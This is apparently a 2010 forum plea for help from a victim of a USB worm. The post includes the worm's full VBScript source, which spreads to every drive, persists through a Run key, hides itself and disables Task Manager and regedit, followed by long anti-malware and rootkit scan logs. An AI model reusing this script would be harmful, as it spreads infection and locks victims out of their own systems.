My problem started when I borrowed my classmate's USB flash drive and clicked a "katrinascandal.vbs". . .
Then, not knowing anything, I didn't think my drive was going to be infected with it.
Then I started opening "My Computer", then C:, and I found out I had "Katrinascandal.vbs".
So I tried to delete it, but when I clicked refresh it came back. Then I tried to delete it
again and empty the Recycle Bin, but it always comes back. Then I checked my G: drive and it has it
too; all my drives have it. . .
But then I was confident that there would be no complications, until I tried to open
Task Manager using Ctrl+Alt+Del, but one of the buttons is gone: the
"Start Task Manager" one. I didn't know what to do, so I opened some sites that might help me, but many of the forums say to fix it using regedit, so I followed that: I opened cmd, then I typed regedit,
but it says "Registry editing has been disabled by your administrator".
So my problem has gotten bigger. . .
Until I tried to change the default opener of .vbs files: I opened "katrinascandal.vbs"
using Notepad, then I analyzed it and I saw this:
On Error Resume Next
Dim fso, ax, win, wscr, kk, tf, scrText
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop
ax = fso.FileExists(win & "\AdobeCS4.vbs")
Set myFile = fso.CreateTextFile(win & "\AdobeCS4.vbs", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(win & "\AdobeCS4.vbs")
fAttr.Attributes=39
wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePhotoshopCS4", "wscript.exe """ & win & "\AdobeCS4.vbs"""
If ax = false Then wscr.Run "wscript.exe """ & win & "\AdobeCS4.vbs"""
While (True)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
If myFlashDrive.Drivetype = 1 Or myFlashDrive.Drivetype = 2 And myFlashDrive.Path <> "A:" Then
Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\KatrinaScandal.vbs", true)
myFile.write scrText
myFile.close
Set myFile = fso.CreateTextFile(win & "\AdobeCS4.vbs", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(win & "\AdobeCS4.vbs")
fAttr.Attributes=39
Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\ReadMe.txt", true)
myFile.write "[Check This out]" & vbCrLf & "" & vbCrLf & "you need a rest your tired"
myFile.close
End if
Next
With wscr
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePhotoshopCS4", "wscript.exe """ & win & "\AdobeCS4.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
End With
If fso.FileExists(myFlashDrive.Path & "\solution.vbs") Then
kk = fso.Deletefile(myFlashDrive.Path & "\solution.vbs")
End If
If tf <> win & "\AdobeCS4.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
WScript.Sleep 10000
WEnd
Here's the Malwarebytes' Anti-Malware log:
Malwarebytes' Anti-Malware 1.46
[url]www.malwarebytes.org[/url]
Database version: 4974
Windows 6.1.7600
Internet Explorer 8.0.7600.16385
10/18/2010 4:40:46 PM
mbam-log-2010-10-18 (16-40-46).txt
Scan type: Full scan (C:\|F:\|G:\|)
Objects scanned: 238281
Time elapsed: 43 minute(s), 40 second(s)
Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 4
Registry Values Infected: 1
Registry Data Items Infected: 2
Folders Infected: 2
Files Infected: 4
Memory Processes Infected:
(No malicious items detected)
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
HKEY_CLASSES_ROOT\CLSID\{147a976f-eee1-4377-8ea7-4716e4cdd239} (Adware.MyWebSearch) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a078f691-9c07-4af2-bf43-35e79eecf8b7} (Adware.Softomate) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{4d1ec4ca-4b92-4324-b8f8-c9a6ed06a8ae} (Adware.Hotbar) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{4e674574-3f0b-491d-8ae3-f90b43a34fd6} (Adware.Hotbar) -> Quarantined and deleted successfully.
Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions\hblite@hblite.com (Adware.HotBar) -> Quarantined and deleted successfully.
Registry Data Items Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools (Hijack.Regedit) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr (Hijack.TaskManager) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
Folders Infected:
C:\Users\Se7en Ultimate\AppData\Roaming\HBLite (Adware.Hotbar) -> Quarantined and deleted successfully.
C:\ProgramData\HBLiteSA (Adware.Hotbar) -> Quarantined and deleted successfully.
Files Infected:
C:\Users\Se7en Ultimate\Desktop\Downloads\Completed\Bit Defender total security 2010\Bit Defender Total Security 2010 Best of Computers Cracked\Patch.exe (Malware.Tool) -> Quarantined and deleted successfully.
C:\Windows\Temp\TMP3F06.tmp (Trojan.Orsam) -> Quarantined and deleted successfully.
F:\Keygens\EA Games Generic Keygen 190.exe (Trojan.Orsam) -> Quarantined and deleted successfully.
C:\Windows\System32\secushr.dat (Malware.Trace) -> Quarantined and deleted successfully.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Here's the GMER One.log
There's nothing in there?
Is that a problem?
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Here's the GMER Two.log
GMER 1.0.15.15477 - [url]http://www.gmer.net[/url]
Rootkit scan 2010-10-18 15:53:55
Windows 6.1.7600
Running: z2lr9hce.exe
---- Registry - GMER 1.0.15 ----
Reg HKLM\SYSTEM\CurrentControlSet\services\sptd\Cfg@s1 771343423
Reg HKLM\SYSTEM\CurrentControlSet\services\sptd\Cfg@s2 285507792
---- EOF - GMER 1.0.15 ----
Here's the DDS.txt
DDS (Ver_10-10-21.02) - NTFS_AMD64
Run by Se7en Ultimate at 16:46:34.27 on Mon 10/18/2010
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_21
Microsoft Windows 7 Ultimate 6.1.7600.0.1252.1.1033.18.3839.2392 [GMT -7:00]
AV: avast! antivirus 4.8.1201 [VPS 100204-0] *On-access scanning enabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}
SP: avast! antivirus 4.8.1201 [VPS 100204-0] *enabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}
============== Running Processes ===============
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Windows\System32\wscript.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
C:\Program Files\Windows Sidebar\sidebar.exe
F:\Programs\uTorrent.exe
C:\Program Files (x86)\RapidBIT\cisvc.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Program Files (x86)\Uniblue\PowerSuite\powersuite.exe
C:\Windows\SysWOW64\FL\SofonicaFolderSoldier.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k iissvcs
C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Uniblue\SpeedUpMyPC\sump.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Program Files (x86)\Uniblue\RegistryBooster\registrybooster.exe
C:\Program Files (x86)\Uniblue\DriverScanner\driverscanner.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Users\Se7en Ultimate\Desktop\dds.scr
C:\Windows\system32\conhost.exe
============== Pseudo HJT Report ===============
uDefault_Search_URL = hxxp://www.google.com/ie
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
BHO: Octh Class: {000123b4-9b42-4900-b3f7-f4b073efc214} - F:\Programs\Orbitdownloader\orbitcth.dll
BHO: &Yahoo! Toolbar Helper: {02478d38-c3f9-4efb-9b51-7695eca05670} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll
BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: PC Tools Browser Guard BHO: {2a0f3d1b-0909-4ff4-b272-609cce6054e7} - C:\Program Files (x86)\Spyware Doctor\BDT\PCTBrowserDefender.dll
BHO: FlashGetBHO: {b070d3e3-fec0-47d9-8e8a-99d4eeb3d3b0} - C:\Users\Se7en Ultimate\AppData\Roaming\FlashGetBHO\FlashGetBHO3.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
BHO: SingleInstance Class: {fdad4da1-61a2-4fd8-9c17-86f7ac245081} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll
TB: Grab Pro: {c55bbcd6-41ad-48ad-9953-3609c48eacc7} - F:\Programs\Orbitdownloader\GrabPro.dll
TB: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll
TB: PC Tools Browser Guard: {472734ea-242a-422b-adf8-83d1e48cc825} - C:\Program Files (x86)\Spyware Doctor\BDT\PCTBrowserDefender.dll
TB: {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
uRun: [Messenger (Yahoo!)] "C:\PROGRA~2\Yahoo!\MESSEN~1\YahooMessenger.exe" -quiet
uRun: [LightScribe Control Panel] C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
uRun: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
uRun: [uTorrent] "F:\Programs\uTorrent.exe" /HIDE
uRun: [PowerSuite] "C:\Program Files (x86)\Uniblue\PowerSuite\launcher.exe" delay 20000 -m
mRun: [avast!] "C:\Program Files\Alwil Software\Avast4\ashDisp.exe"
mRun: [NBKeyScan] "F:\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
mRun: [SofonicaFolderSoldier] C:\Windows\SysWOW64\FL\SofonicaFolderSoldier.exe
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [mspaint] "C:\Windows\system32\Paint.exe" -autocheck
uPolicies-system: DisableRegistryTools = 1 (0x1)
uPolicies-system: DisableTaskMgr = 1 (0x1)
mPolicies-explorer: NoActiveDesktop = 1 (0x1)
mPolicies-explorer: NoActiveDesktopChanges = 1 (0x1)
mPolicies-system: ConsentPromptBehaviorAdmin = 0 (0x0)
mPolicies-system: ConsentPromptBehaviorUser = 3 (0x3)
mPolicies-system: EnableLUA = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
IE: &Download by Orbit - F:\Programs\Orbitdownloader\orbitmxt.dll/201
IE: &Grab video by Orbit - F:\Programs\Orbitdownloader\orbitmxt.dll/204
IE: Add to Google Photos Screensa&ver - C:\Windows\system32\GPhotos.scr/200
IE: Do&wnload selected by Orbit - F:\Programs\Orbitdownloader\orbitmxt.dll/203
IE: Down&load all by Orbit - F:\Programs\Orbitdownloader\orbitmxt.dll/202
IE: Download all by FlashGet3 - C:\Users\Se7en Ultimate\AppData\Roaming\FlashGetBHO\GetAllUrl.htm
IE: Download by FlashGet3 - C:\Users\Se7en Ultimate\AppData\Roaming\FlashGetBHO\GetUrl.htm
IE: Download with Xilisoft YouTube Video Converter
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\OFFICE11\EXCEL.EXE/3000
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - C:\PROGRA~2\MICROS~1\OFFICE11\REFIEBAR.DLL
LSP: C:\Program Files (x86)\Common Files\PC Tools\Lsp\PCTLsp.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
mASetup: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "C:\Program Files (x86)\Common Files\LightScribe\LSRunOnce.exe"
================= FIREFOX ===================
FF - ProfilePath - C:\Users\SE7ENU~1\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\
FF - prefs.js: browser.search.defaulturl - hxxp://search.yahoo.com/search?fr=ffsp1&p=
FF - prefs.js: browser.search.selectedEngine - RomUlation ROM Search
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com.ph/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT2653012&q=
FF - component: C:\Users\Se7en Ultimate\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\extensions\{b2e293ee-fd7e-4c71-a714-5f4750d8d7b7}\components\FFExternalAlert.dll
FF - component: C:\Users\Se7en Ultimate\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\extensions\{b2e293ee-fd7e-4c71-a714-5f4750d8d7b7}\components\RadioWMPCore.dll
FF - component: C:\Users\Se7en Ultimate\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\extensions\{cd90bf73-20f6-44ef-993d-bb920303bd2e}\components\FFExternalAlert.dll
FF - component: C:\Users\Se7en Ultimate\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\extensions\{cd90bf73-20f6-44ef-993d-bb920303bd2e}\components\RadioWMPCore.dll
FF - component: C:\Users\Se7en Ultimate\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\extensions\{DB9127A2-3381-41ec-82B3-1B6ED4C6F29A}\components\FlashGetXPI.dll
FF - component: F:\Programs\Orbitdownloader\addons\OneClickYouTubeDownloader\components\GrabXpcom.dll
FF - plugin: C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
FF - plugin: C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Mozilla Firefox\plugins\npclntax_HBLiteSA.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll
FF - plugin: F:\Programs\Netscape6\nppl3260.dll
FF - plugin: F:\Programs\Netscape6\nprpjplug.dll
FF - plugin: F:\Programs\Plugins\npqtplugin.dll
FF - plugin: F:\Programs\Plugins\npqtplugin2.dll
FF - plugin: F:\Programs\Plugins\npqtplugin3.dll
FF - plugin: F:\Programs\Plugins\npqtplugin4.dll
FF - plugin: F:\Programs\Plugins\npqtplugin5.dll
FF - plugin: F:\Programs\Plugins\npqtplugin6.dll
FF - plugin: F:\Programs\Plugins\npqtplugin7.dll
FF - HiddenExtension: Java Console: No Registry Reference - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBA}
FF - HiddenExtension: Java Console: No Registry Reference - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}
---- FIREFOX POLICIES ----
FF - user.js: yahoo.ytff.general.dontshowhpoffer - true
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbaam7a8h", true);
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--fiqz9s", true); // Traditional
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--fiqs8s", true); // Simplified
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--j6w193g", true);
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgberp4a5d4ar", true);
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgberp4a5d4a87g", true);
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbqly7c0a67fbc", true);
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbqly7cvafr", true);
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--kpry57d", true); // Traditional
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--kprw13d", true); // Simplified
============= SERVICES / DRIVERS ===============
R0 PCTCore;PCTools KDS;C:\Windows\System32\drivers\PCTCore64.sys [2010-10-16 233488]
R1 aswSP;avast! Self Protection;C:\Windows\System32\drivers\aswSP.sys [2010-2-3 89680]
R2 aswFsBlk;aswFsBlk;C:\Windows\System32\drivers\aswFsBlk.sys [2010-2-3 22096]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2010-2-3 65616]
R2 avast! Antivirus;avast! Antivirus;C:\Program Files\Alwil Software\Avast4\ashServ.exe [2010-2-4 138680]
R2 FlexService;Remote Connections Service;C:\Program Files (x86)\RapidBIT\cisvc.exe [2009-5-17 41984]
R3 avast! Mail Scanner;avast! Mail Scanner;C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe [2010-2-4 254040]
R3 avast! Web Scanner;avast! Web Scanner;C:\Program Files\Alwil Software\Avast4\ashWebSv.exe [2010-2-4 352920]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S2 Uniblue DiskRescue;Uniblue DiskRescue; [x]
S3 npggsvc;nProtect GameGuard Service;C:\Windows\system32\GameMon.des -service --> C:\Windows\system32\GameMon.des -service [?]
S3 sdAuxService;PC Tools Auxiliary Service;C:\Program Files (x86)\Spyware Doctor\pctsAuxs.exe [2010-10-16 366840]
S3 sdCoreService;PC Tools Security Service;C:\Program Files (x86)\Spyware Doctor\pctsSvc.exe [2010-10-16 1142224]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2010-7-18 1255736]
S4 Browser Defender Update Service;Browser Defender Update Service;C:\Program Files (x86)\Spyware Doctor\BDT\BDTUpdateService.exe [2010-10-16 112592]
=============== Created Last 30 ================
2010-10-18 23:43:17 -------- d-----w- C:\Users\SE7ENU~1\AppData\Local\Adobe
2010-10-18 19:12:58 2911 ----a-w- C:\KatrinaScandal.vbs
2010-10-18 02:32:36 -------- d-----w- C:\Users\SE7ENU~1\AppData\Roaming\Malwarebytes
2010-10-18 02:32:25 38224 ----a-w- C:\Windows\SysWow64\drivers\mbamswissarmy.sys
2010-10-18 02:32:24 24664 ----a-w- C:\Windows\System32\drivers\mbam.sys
2010-10-18 02:32:24 -------- d-----w- C:\Program Files (x86)\Malwarebytes' Anti-Malware
2010-10-18 02:32:24 -------- d-----w- C:\PROGRA~3\Malwarebytes
2010-10-18 01:54:55 388096 ----a-r- C:\Users\SE7ENU~1\AppData\Roaming\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2010-10-18 01:54:55 -------- d-----w- C:\Program Files (x86)\Trend Micro
2010-10-16 23:37:08 767952 ----a-w- C:\Windows\BDTSupport.dll
2010-10-16 23:37:07 165840 ----a-w- C:\Windows\PCTBDRes.dll
2010-10-16 23:37:07 1652688 ----a-w- C:\Windows\PCTBDCore.dll
2010-10-16 23:37:07 149456 ----a-w- C:\Windows\SGDetectionTool.dll
2010-10-16 23:22:53 306648 ----a-w- C:\Windows\System32\drivers\pctgntdi64.sys
2010-10-16 23:22:53 133072 ----a-w- C:\Windows\System32\drivers\pctwfpfilter64.sys
2010-10-16 23:22:49 233488 ----a-w- C:\Windows\System32\drivers\PCTCore64.sys
2010-10-16 23:22:42 92896 ----a-w- C:\Windows\System32\drivers\pctplsg64.sys
2010-10-16 23:22:26 -------- d-----w- C:\Users\SE7ENU~1\AppData\Roaming\PC Tools
2010-10-16 23:22:26 -------- d-----w- C:\Program Files (x86)\Spyware Doctor
2010-10-16 23:22:26 -------- d-----w- C:\Program Files (x86)\Common Files\PC Tools
2010-10-16 15:35:56 641536 ----a-w- C:\Windows\SysWow64\CPFilters.dll
2010-10-16 15:35:56 552960 ----a-w- C:\Windows\System32\msdri.dll
2010-10-16 15:35:55 961024 ----a-w- C:\Windows\System32\CPFilters.dll
2010-10-16 15:35:55 288256 ----a-w- C:\Windows\System32\MSNP.ax
2010-10-16 15:35:55 258560 ----a-w- C:\Windows\System32\mpg2splt.ax
2010-10-16 15:35:55 204288 ----a-w- C:\Windows\SysWow64\MSNP.ax
2010-10-16 15:35:55 199680 ----a-w- C:\Windows\SysWow64\mpg2splt.ax
2010-10-16 15:26:34 27008 ----a-w- C:\Windows\System32\drivers\Diskdump.sys
2010-10-15 20:41:59 8006480 ----a-w- C:\PROGRA~3\Microsoft\Windows Defender\Definition Updates\{266B8237-6E1E-43F2-880D-4517A69C119A}\mpengine.dll
2010-10-14 18:06:53 -------- d-sh--w- C:\Windows\System32\%APPDATA%
2010-10-14 00:40:51 -------- d-----w- C:\PROGRA~3\BitDefender
2010-10-14 00:40:47 291352 ----a-w- C:\Windows\SysWow64\drivers\bdfsfltr.sys
2010-10-13 22:29:20 -------- d-----w- C:\Users\SE7ENU~1\AppData\Local\Threat Expert
2010-10-13 21:21:20 -------- d-----w- C:\PROGRA~3\PC Tools
2010-10-13 03:10:27 2911 --sha-r- C:\Windows\AdobeCS4.vbs
2010-10-12 17:02:46 -------- d-----w- C:\Windows\W7FBC
2010-10-09 16:25:44 -------- d-----w- C:\Users\SE7ENU~1\AppData\Roaming\Godlike
2010-10-06 05:22:59 1638912 ----a-w- C:\Windows\System32\mshtml.tlb
2010-10-06 05:13:40 167424 ----a-w- C:\Program Files\Windows Media Player\wmplayer.exe
2010-10-06 05:13:40 164864 ----a-w- C:\Program Files (x86)\Windows Media Player\wmplayer.exe
2010-10-06 05:13:39 12625408 ----a-w- C:\Windows\SysWow64\wmploc.DLL
2010-10-06 05:13:38 12625920 ----a-w- C:\Windows\System32\wmploc.DLL
2010-10-06 05:12:18 9728 ----a-w- C:\Windows\SysWow64\sscore.dll
2010-10-06 05:12:18 463360 ----a-w- C:\Windows\System32\drivers\srv.sys
2010-10-06 05:12:18 402944 ----a-w- C:\Windows\System32\drivers\srv2.sys
2010-10-06 05:12:18 236032 ----a-w- C:\Windows\System32\srvsvc.dll
2010-10-06 05:12:18 161792 ----a-w- C:\Windows\System32\drivers\srvnet.sys
2010-10-06 04:51:14 954752 ----a-w- C:\Windows\SysWow64\mfc40.dll
2010-10-06 04:51:14 954288 ----a-w- C:\Windows\SysWow64\mfc40u.dll
2010-10-06 04:28:27 3123712 ----a-w- C:\Windows\System32\win32k.sys
2010-10-06 04:17:51 148992 ----a-w- C:\Windows\System32\t2embed.dll
2010-10-06 04:17:51 109056 ----a-w- C:\Windows\SysWow64\t2embed.dll
2010-10-06 04:17:45 4582912 ----a-w- C:\Program Files\Windows NT\Accessories\wordpad.exe
2010-10-06 04:17:45 2085376 ----a-w- C:\Windows\System32\ole32.dll
2010-10-06 04:17:44 4247040 ----a-w- C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
2010-10-06 04:17:44 1413632 ----a-w- C:\Windows\SysWow64\ole32.dll
2010-10-06 04:14:52 483840 ----a-w- C:\Windows\System32\StructuredQuery.dll
2010-10-06 04:14:52 363520 ----a-w- C:\Windows\SysWow64\StructuredQuery.dll
2010-10-06 04:14:46 340992 ----a-w- C:\Windows\System32\schannel.dll
2010-10-06 04:14:46 224256 ----a-w- C:\Windows\SysWow64\schannel.dll
2010-10-06 04:14:37 633856 ----a-w- C:\Windows\System32\comctl32.dll
2010-10-06 04:14:37 530432 ----a-w- C:\Windows\SysWow64\comctl32.dll
2010-10-06 04:09:26 1024512 ----a-w- C:\Windows\System32\wmpmde.dll
2010-10-06 04:09:25 738816 ----a-w- C:\Windows\SysWow64\wmpmde.dll
2010-10-04 05:45:51 -------- d-----w- C:\downloads
2010-09-28 23:38:25 -------- d-----w- C:\Program Files (x86)\Combined Community Codec Pack
2010-09-28 22:45:15 1414440 ----a-w- C:\Windows\SysWow64\ShellManager310E2D762.dll
2010-09-28 07:42:51 243712 ----a-w- C:\Windows\System32\drivers\ks.sys
2010-09-28 03:47:29 2048 ----a-w- C:\Windows\SysWow64\tzres.dll
2010-09-28 03:47:29 2048 ----a-w- C:\Windows\System32\tzres.dll
2010-09-28 03:42:22 13312 ----a-w- C:\Program Files\Internet Explorer\iecompat.dll
2010-09-28 03:42:22 13312 ----a-w- C:\Program Files (x86)\Internet Explorer\iecompat.dll
2010-09-24 04:41:05 -------- d-----w- C:\Users\SE7ENU~1\AppData\Local\Microsoft Games
2010-09-20 11:41:25 -------- d-----w- C:\Users\SE7ENU~1\AppData\Local\MPlayer
==================== Find3M ====================
2010-10-19 18:41:44 270720 ------w- C:\Windows\System32\MpSigStub.exe
2010-09-18 09:48:53 56 --sh--r- C:\Windows\SysWow64\CA10C53E1D.sys
2010-09-18 09:48:53 1890 --sha-w- C:\Windows\SysWow64\KGyGaAvL.sys
2010-09-17 15:22:11 423656 ----a-w- C:\Windows\SysWow64\deployJava1.dll
2010-09-14 08:00:00 108032 ----a-w- C:\Windows\SysWow64\ff_vfw.dll
2010-09-10 05:35:44 135168 ----a-w- C:\Windows\apppatch\AppPatch64\AcXtrnal.dll
2010-09-10 05:35:43 347648 ----a-w- C:\Windows\apppatch\AppPatch64\AcLayers.dll
2010-09-09 23:16:04 1314816 ----a-w- C:\Windows\is-7CKEP.exe
2010-09-08 05:36:17 1192960 ----a-w- C:\Windows\System32\wininet.dll
2010-09-08 05:34:34 57856 ----a-w- C:\Windows\System32\licmgr10.dll
2010-09-08 04:30:04 978432 ----a-w- C:\Windows\SysWow64\wininet.dll
